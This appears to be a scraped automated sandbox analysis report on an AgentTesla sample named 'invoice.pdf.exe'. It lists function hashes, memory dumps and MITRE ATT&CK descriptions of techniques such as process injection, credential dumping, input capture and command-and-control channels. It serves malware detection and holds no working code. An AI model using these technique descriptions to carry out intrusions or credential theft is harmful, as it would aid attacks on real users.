Opcode Fuzzy Hash: cf3ef0d63ae80d0bd170ae23c565c8ac465f1954041229cd8a2d1b67399c9dd4
Instruction Fuzzy Hash: 9E11B7B5908341AFD350CF19D880A5BFBE4FB88664F04896EF998D7311D235EA048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 01700724, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.503439141.0000000001700000.00000040.00000040.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40effbb74c40cdc388ca09e24e425c0b54c7bc58b7587a4d17e32e893f89134a
Instruction ID: d3a61491e48a3a8f45d278ed7397edd574c3fbe8fe1d84e74a55c606c6d9ebb8
Opcode Fuzzy Hash: 40effbb74c40cdc388ca09e24e425c0b54c7bc58b7587a4d17e32e893f89134a
Instruction Fuzzy Hash: CE216D3550D3C48FD707CB24D850B55BFB2AF47218F29C6DEE4858B6A3D23A9806DB52

Uniqueness

Uniqueness Score: -1.00%

Function 0170075C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.503439141.0000000001700000.00000040.00000040.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03374ef09cb8941b81e0c3af5962d81037eadaa98ccbd8062f747a9b3cc80e34
Instruction ID: 92dbed95787fc56520036cb61b57a5b21ae724a95de323911496b8a25a5a3485
Opcode Fuzzy Hash: 03374ef09cb8941b81e0c3af5962d81037eadaa98ccbd8062f747a9b3cc80e34
Instruction Fuzzy Hash: 7011C334208344DFD716CB14D980B25FBD5AB48B28F24C59DE9495B683C77B9403CE51

Uniqueness

Uniqueness Score: -1.00%

Function 06332E38, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80cd105010751ce7fc0de6b4e42e4b18320140a46e499aff561476b478e7622
Instruction ID: 91ab1c86151b42d0be75939d6a7fb14f0740c7282d11b05d719cc9faae1453b4
Opcode Fuzzy Hash: c80cd105010751ce7fc0de6b4e42e4b18320140a46e499aff561476b478e7622
Instruction Fuzzy Hash: 8A113C35F001158F8B81EBB8D9545AEB7F6EFC9210B104169D109E3344EF359E42CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 06332F58, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231bbf5081c6d105837c1cb342acafbbdfeca67c1f964119d6a8f5852bf1ced8
Instruction ID: 0de15a98302b13e65dd6f3a5a4372482ee3e3c74dba1192f0edafcdf39f5768c
Opcode Fuzzy Hash: 231bbf5081c6d105837c1cb342acafbbdfeca67c1f964119d6a8f5852bf1ced8
Instruction Fuzzy Hash: 7F115B35F001158F8B81EBB9EA545AEBBF6EF8D210B108169D109E3354EF35AE018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 06331798, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02bae9d9c7ccc3c0321834c2abf1f929fe8ed58b835353f0be2225c09c927c0
Instruction ID: c7e57b3a17fb1f5536c4592d309d61e7de5abf11ac9209bf6cb0cdc26fe9cad9
Opcode Fuzzy Hash: c02bae9d9c7ccc3c0321834c2abf1f929fe8ed58b835353f0be2225c09c927c0
Instruction Fuzzy Hash: EF115E35F001158F8B41EBB8E9545AEBBF6EF89210B20816AD109E7344FF359D018BD5

Uniqueness

Uniqueness Score: -1.00%

Function 063309C8, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f349f5fed85fed032cb7658d400719afc9dd192e72c0de98169be91ed916cbf1
Instruction ID: 1e6976290bb8a58e9aafdb24d90241568128a496212f15d36c5aaef28099e1bf
Opcode Fuzzy Hash: f349f5fed85fed032cb7658d400719afc9dd192e72c0de98169be91ed916cbf1
Instruction Fuzzy Hash: BA115E35F001198F8B81EBB8E9545AEB7F6EF8D250B608169D509E3344EF359D018B91

Uniqueness

Uniqueness Score: -1.00%

Function 063346D8, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec50eb7f6c1d9ac79c9e1553af78bd7aae69b5a1d5a03b9d52e7d0841e0e215
Instruction ID: 1783ce65dc9c7c1b1306234469b4bd6399a37e679a484ea7b91049294a1b9180
Opcode Fuzzy Hash: 8ec50eb7f6c1d9ac79c9e1553af78bd7aae69b5a1d5a03b9d52e7d0841e0e215
Instruction Fuzzy Hash: A4018070E002059FCB80EBB9D944B6EBBF5EB45314F11407AD518DB255EB31A8458BD5

Uniqueness

Uniqueness Score: -1.00%

Function 063346CB, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa80d8a023070d5725bd03cc7ec04ed90e2b8ea9f6254c6c847580b31e285e35
Instruction ID: 94be1a432493046dd62e0d7f22cd46538e2ba630ea49995e05dbf4962a45aa88
Opcode Fuzzy Hash: aa80d8a023070d5725bd03cc7ec04ed90e2b8ea9f6254c6c847580b31e285e35
Instruction Fuzzy Hash: C511AD70E002169FC780CFB9D844BABFBF5EB45210F10827AD528DB292E730A846CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 017005D0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.503439141.0000000001700000.00000040.00000040.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad19ef1c6222799b79620e42e2ffa73e1f4e7955920204ff38009e929c370b1
Instruction ID: dc94a69b21093ea2e495dae98d75e4573dcf52a7690b1e9945aa9707dafca86e
Opcode Fuzzy Hash: cad19ef1c6222799b79620e42e2ffa73e1f4e7955920204ff38009e929c370b1
Instruction Fuzzy Hash: DC0186765097806FD7128B16EC50863FFB8DB86620719C5AFEC498B612D229B808CB76

Uniqueness

Uniqueness Score: -1.00%

Function 063340C6, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 559190fd3cb471b1ad8d7908a58b7439e35476c31400258899c776b960b2e82c
Instruction ID: e950f79f9a168d1468448f8942c4da00264998cd8dd432a96781697f9bf928cf
Opcode Fuzzy Hash: 559190fd3cb471b1ad8d7908a58b7439e35476c31400258899c776b960b2e82c
Instruction Fuzzy Hash: C9F0F632F08924CBCB10BBB8B95416CB7E6AB84215F01497CD64993345EF314D34C3C6

Uniqueness

Uniqueness Score: -1.00%

Function 01700818, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.503439141.0000000001700000.00000040.00000040.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f6f7c96804cda76668e35a3bbcf86681c06fe62140db942cdcb6afdd34f29c
Instruction ID: 859a05dc79c89daf4786ac2d386dcf014065ee72e6519f95b4f60729faf40f8f
Opcode Fuzzy Hash: c3f6f7c96804cda76668e35a3bbcf86681c06fe62140db942cdcb6afdd34f29c
Instruction Fuzzy Hash: EAF0FB35148644DFC606CF44D940B15FBE6FB89718F24C6A9E9491B652C33B9813DA81

Uniqueness

Uniqueness Score: -1.00%

Function 017005F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.503439141.0000000001700000.00000040.00000040.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58539329c69f66b3853a348adef0a08421b8566e920394fdae027ef0b5e7646
Instruction ID: 19d26532ad51cb7985b9b0e28249047e9ea12f204a25be2b4601d28253027c29
Opcode Fuzzy Hash: f58539329c69f66b3853a348adef0a08421b8566e920394fdae027ef0b5e7646
Instruction Fuzzy Hash: B7E092766406004BD750CF0AFC41456F7D8EB88630718C07FDC0D8BB00D635B504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 06330A27, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4abf13721fc91f301e042ef7b2f4d685b8617d5c30da98ef8d70352ee372dc7f
Instruction ID: ae8052861f697d45a1227df798b70e571e49b1bbdcd85306f7aff7fdd942301b
Opcode Fuzzy Hash: 4abf13721fc91f301e042ef7b2f4d685b8617d5c30da98ef8d70352ee372dc7f
Instruction Fuzzy Hash: 9DE0ED35F000058F8B55F7B8FA5499DB3F1AF982647118065D109E7254EF359D118B51

Uniqueness

Uniqueness Score: -1.00%

Function 06332FB7, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f766a0123dd3cb34db5e92338ac798c398e76a51c92a5b7a8bcf96abcb5549db
Instruction ID: a8eb318147538c57d21df361f35834d87851ab619a1a5b00d162e56bede38c06
Opcode Fuzzy Hash: f766a0123dd3cb34db5e92338ac798c398e76a51c92a5b7a8bcf96abcb5549db
Instruction Fuzzy Hash: 61E0E535F000458F8B45EBB8EA548DDB3F2AF9822471180A5D119E7254EF36AD168B62

Uniqueness

Uniqueness Score: -1.00%

Function 06332E97, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ce2cb3236327ae81c9e714387072e67c2f0321f7a2f77f9de93863f213ac7a
Instruction ID: 7a7b5166193dd4eee9e4cc596adb3ac9b6b2449ad573178afe4e6356ee8d550a
Opcode Fuzzy Hash: 04ce2cb3236327ae81c9e714387072e67c2f0321f7a2f77f9de93863f213ac7a
Instruction Fuzzy Hash: 39E06D35F001048F8F40F7B8EA548DDB3F1AFC82207114065D109E3254EF319D028B51

Uniqueness

Uniqueness Score: -1.00%

Function 063317F7, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509946716.0000000006330000.00000040.00000001.sdmp, Offset: 06330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc4e7ac2c9c75d054b554fbbb4f6346f1fefa728dd0a7f6e45fba1cd4554461
Instruction ID: eb96cf4b165e33b29fa4c473096bd017dfcb0e9ffa0e9956404b576939578c25
Opcode Fuzzy Hash: 5dc4e7ac2c9c75d054b554fbbb4f6346f1fefa728dd0a7f6e45fba1cd4554461
Instruction Fuzzy Hash: 4AE0ED35F040058FCB45F7B8FA548DDB3F1AF882647119165D109E7254EF359D118B51

Uniqueness

Uniqueness Score: -1.00%

Function 060A3083, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509873469.00000000060A0000.00000040.00000001.sdmp, Offset: 060A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b5d43a34b5315ae02789cac5c71e77e12d7548f91373806647eb3e3b78b046
Instruction ID: 7a55cb18403153ff68e8dd80c8421e961217346f1a0b8a41c2fcf47f32deb6aa
Opcode Fuzzy Hash: 96b5d43a34b5315ae02789cac5c71e77e12d7548f91373806647eb3e3b78b046
Instruction Fuzzy Hash: 30E0D87254030467D2209F06EC81B63FB58DB44A70F04C567ED081B702D175B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 060A3397, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509873469.00000000060A0000.00000040.00000001.sdmp, Offset: 060A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 983561d4dd5cd0a4586d8f5b3d2c65c7156987eb0f5cb2d25dc83abfbe556d14
Instruction ID: 2ed65d6f6a7e4f38285fb018d2068507c8a27a26b8d2405d1b83fcaf44bdfda1
Opcode Fuzzy Hash: 983561d4dd5cd0a4586d8f5b3d2c65c7156987eb0f5cb2d25dc83abfbe556d14
Instruction Fuzzy Hash: 5FE0D87254020067D2209E06EC41B63FB98DB44A70F04C467ED081B702D176B514CEF5

Uniqueness

Uniqueness Score: -1.00%

Function 060A3AEB, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.509873469.00000000060A0000.00000040.00000001.sdmp, Offset: 060A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b54063846280f22f8f72490603a6ddb739f361135b7bd3e2f3f9d9fecedc872
Instruction ID: eb946efafa1d546be5f69adca64dca15b944e0e2a3582c2e1458f64207bbb889
Opcode Fuzzy Hash: 2b54063846280f22f8f72490603a6ddb739f361135b7bd3e2f3f9d9fecedc872
Instruction Fuzzy Hash: 96E0D8B254030067D2209E06EC41B63FB98DB54A70F04C467ED081B702D175B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 016B23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.503140767.00000000016B2000.00000040.00000001.sdmp, Offset: 016B2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f7a2d63d25bd9a62c22646717eb66f4d118abcc9cb79d0601f3151fc896346
Instruction ID: 6277eca16a0e744629f5c554b20eda738608581c6126d0f7cd0453b6b296a6d0
Opcode Fuzzy Hash: 82f7a2d63d25bd9a62c22646717eb66f4d118abcc9cb79d0601f3151fc896346
Instruction Fuzzy Hash: 75D05E79206A914FE3268A1CD5B8BD53FE4AF51B05F4644FDE8008BB63C368E5D1D600

Uniqueness

Uniqueness Score: -1.00%

Function 016B23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.503140767.00000000016B2000.00000040.00000001.sdmp, Offset: 016B2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1a8d9004e48e3729506004d92be5c220a7c7c92001458f1db6b1fe51fa4ed6c
Instruction ID: 6e0251918a40ae8cc91e70e387588021e1e22556134232e2486214af8a5e78bf
Opcode Fuzzy Hash: d1a8d9004e48e3729506004d92be5c220a7c7c92001458f1db6b1fe51fa4ed6c
Instruction Fuzzy Hash: 41D05E342412814BD725DB0CC5E4F993BD4AB81B00F0644FDAC008B362C7A4E8C1C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report invoice.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

SMTP Packets

Code Manipulations

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre